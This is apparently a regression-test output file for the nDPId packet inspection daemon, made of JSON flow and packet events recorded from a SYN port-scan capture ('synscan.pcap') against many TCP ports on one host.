-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRgAADUGslqsEAAIQA2GNIzTC9fdU4MZAAAAAGACCAAktQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs4skAACoGO6msEAAIQA2GNIzTCWHdU4MZAAAAAGACDAAjKwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AEAACgGRHGsEAAIQA2GNIzTB0fdU4MZAAAAAGACBAAtRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIIAAC4GCfGsEAAIQA2GNIzTwADdU4MZAAAAAGACDABsiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxwAADUGyFasEAAIQA2GNIzTJErdU4MZAAAAAGACCAAMQgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsk5cAACsGidusEAAIQA2GNIzTImDdU4MZAAAAAGACEAAGLAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsHsIAACgGAbGsEAAIQA2GNIzTBBndU4MZAAAAAGACBAAwcwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAssGQAACgGcA6sEAAIQA2GNIzTCDfdU4MZAAAAAGACBAAsVQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsGsUAADQG+a2sEAAIQA2GNIzTBETdU4MZAAAAAGACBAAwSAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsALEAADsGDMKsEAAIQA2GNIzTE4rdU4MZAAAAAGACEAAVAgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs5sAAACYGO7KsEAAIQA2GNIzTE4bdU4MZAAAAAGACDAAZBgAAAgQFtA=="} 
-00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 